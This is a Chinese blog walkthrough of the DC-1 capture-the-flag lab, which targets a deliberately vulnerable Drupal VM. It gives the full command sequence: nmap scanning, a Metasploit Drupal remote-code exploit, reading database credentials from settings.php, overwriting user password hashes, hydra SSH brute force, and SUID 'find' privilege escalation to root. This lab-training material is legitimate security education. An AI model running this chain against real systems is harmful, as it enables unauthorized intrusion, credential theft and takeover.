首页 > 其他分享 >DC-1靶场渗透过程详解

DC-1靶场渗透过程详解

时间:2024-12-22 18:02:45浏览次数:10  
标签:加密 查看 DC 靶机 详解 flag4 靶场 php find

主机发现与端口扫描

打开DC-1,确认与主机在同一网段,查看mac地址

查看DC-1靶机ip地址

sudo arp-scan -l

 

 扫描具体端口信息

sudo nmap -A -p- -sS -sC -T4 192.168.100.129

端口信息

22/tcpopensshOpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcpopenhttpApache httpd 2.2.22((Debian))
111/tcpopenrpcbind2-4(RPC #100000)
52523/tcpopenstatus1(RPC #100024)

 可以发现靶机的22,80,111,52523端口已经开放

网站信息

访问dc-1网站

 发现Drupal内容管理系统,用msf扫描 

漏洞扫描与利用

进入msf

msfconsole

搜索durpal的漏洞

 search drupal

 攻击者可以使用该模块利用漏洞执行远程命令,进而控制受影响的Drupal网站

切换到该模块

use 1

 查看具体漏洞

 show options

 

使用set设置rhosts文件,指定靶机的ip地址 

 set rhosts 192.168.100.129

 然后exploit进行攻击,攻击成功后会获得一个meterpreter的shell

(meterpreter是一种用于远程访问受攻击的主机系统的后门程序) 

开始渗透

pwd 查看当前所在我路径,ls 查看所在路径的文件

flag1 

 发现里面有一个flag1.txt文件,cat查看

这边提示要去找CMS中的一个配置文件

shell:以靶机用户的身份运行靶机

开启使用python交互

python -c "import pty;pty.spawn( '/bin/bash')" 

  没有发现关键信息,继续找配置文件

find ./ -name "*settings*" 

 

 flag2

查看默认文件 ./sites/default/settings.php

看到了flag2文件,flag2中告诉我们无法暴力破解并且需要提权。

此外还发现一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。

 mysql -udbuser -pR0ck3t

 查看当前数据库

show databases;

 

 切换至drupaldb

use drupaldb

 查看当前数据库的表

show tables;

发现里面有个users表,是存储网站注册用户的信息表

select*from users;

 

 可以看到表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式 

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

但密文太长难以使用在线解码器解码,准备修改admin密码

先找到加密文件,Drupal的加密脚本在

/var/www/scripts/password-hash.sh

 目录下,我们先退出mysql

exit

 打开加密脚本

cat /var/www/scripts/password-hash.sh

 

 可以看出脚本是用php写的,而且还能用php加参数运行从而直接得到加密后的密码,这里我们设置一个密码123456 

php /var/www/scripts/password-hash.sh 123456

 

得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

mysql -udbuser -pR0ck3t
 
use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

 

 成功修改,查看一下

select * from users;

 尝试登录网站

 flag3

成功登录,寻找有用信息

提示一些passwd和shadow,即linux的文件

flag4

继续查看用户信息

tac /etc/passwd

 

 成功找到flag4用户,回到主目录准备进行Hydra爆破

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.100.129

 

 成功爆破出密码orange,然后用kali连接

ssh flag4@192.168.100.129

 

 成功打开了flag4.txt

linux提权

使用find命令,查询具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

 

 常用find命令执行root权限的命令找查

find / -name index.php -exec "/bin/sh" \;

提权成功,只需要找到最终flag即可

flag5

cd /root
 
ls
 
cat *

 

成功拿到flag5!!! 

标签:加密,查看,DC,靶机,详解,flag4,靶场,php,find
From: https://blog.csdn.net/dengzikan120/article/details/144587853

相关文章

  • 电磁兼容(EMC):LVDS接口电路EMC设计详解
    目录1LVDS接口简介2LVDS接口工作原理3LVDS接口EMC优点4PCB设计要点1LVDS接口简介LVDS接口,即LowVoltageDifferentialSignaling,是一种低压差分信号技术接口。它又称为RS-644总线接口,是美国NS公司(美国国家半导体公司)为克服以TTL电平方式传输宽带高码率数据时功耗......
  • Arrays.asList() 详解
    【1.要点】该方法是将数组转化成List集合的方法。Listlist=Arrays.asList("a","b","c");注意:(1)该方法适用于对象型数据的数组(String、Integer...)(2)该方法不建议使用于基本数据类型的数组(byte,short,int,long,float,double,boolean)(3)该方法将数组与List列表链接起来:当更新其......
  • 鸿蒙开发实战:鸿蒙应用开发中的页面管理工具类详解
    一、引言在鸿蒙应用开发的征程中,如何高效地管理页面布局与显示,以满足用户对于沉浸式体验、个性化StatusBar颜色等界面特性的需求,一直是开发者们关注的焦点。为此,我特别设计了一款实用的“页面管理工具类”,它具备强大的功能,能帮助开发者轻松应对各种页面管理挑战。二、页面管理工......
  • FristiLeaks_1.3(0基础详解)
    1.将虚拟机导入到vm中,扫描获得此靶机的ip靶机ip为192.168.55.1392.进行端口扫描、目录枚举、指纹识别端口扫描:目录枚举:指纹识别:3.进入靶机网页查看信息发现网站没有什么信息目录枚举中有一个robots.txt可以尝试访问一下试试访问这个文件,发现有三个目录......
  • DH 密钥交换协议详解
    1.概述   DH(DiffieHellman)密钥交换协议是一种在不安全的通信信道上,通过公开信息安全地交换密钥的方法。它由WhitfieldDiffie和MartinHellman在1976年提出,是密码学领域的一个重要突破,使得在开放网络环境下安全地建立共享密钥成为可能。2.工作原理   基础数学概念......
  • 【SCA-Goat靶场】一款包含大量安全缺陷的SAC应用程序靶场环境
    关于SCA-GoatSCA-Goat是一款软件组合分析(SCA)应用程序,同时它也一个包含大量安全缺陷的SAC应用程序靶场环境。该工具专注于开发代码中使用的易受攻击和被攻陷的JAR依赖项,为用户提供亲身实践的学习机会,以了解潜在的攻击场景。SCA-Goat旨在帮助广大研究人员识别易受攻击的JA......
  • 第四届“鹏城杯”联邦网络靶场协同攻防演练(初赛)WriteUp
    miscSimplesteganography解压出来一个png修复宽高出1半flag。hint.txt用ntfs流导出一张png图片。从里面拆出一个jpg。arnold置乱解码一次得到flag另一半。取证dump出桌面的base.zip。爆破解压得到base64码表u3=LEnoG9HX2fJPVyIUpjax+8CSqsBOYWmzekwA1Z5grM0F/6DTNhQb......
  • dvwa靶场学习—1、VMware16虚拟机安装win10系统
    参考:https://blog.csdn.net/u013097500/article/details/130922242?ops_request_misc=%257B%2522request%255Fid%2522%253A%25229f57538a8985bd22b94ddc3c4206a75e%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=9f57538a8985bd22b94ddc3c4......
  • MyBatis-Plus快速入门及详解(看这一篇就够了)
    简介黑马MyBatisPlus教程全套视频教程,快速精通mybatisplus框架(2022年版)基于MyBatisPlus(简称MP)完成标准的Dao开发MP是基于MyBatis框架基础上开发的增强型工具,旨在简化开发,提高效率MyBatis-Plus......
  • MyBatis之mappers详解
    要点环境准备因为从数据库中拿到的数据需要转换为实体类对象,所以需要定义一个pojo来接受和转换数据实体类(pojo)创建完成之后需要创建mapper接口,mapper接口就相当于原来的daomapper接口的命名和实体类名对应,因为myBatis有面向接口编程的功能,所以每当我们调用接......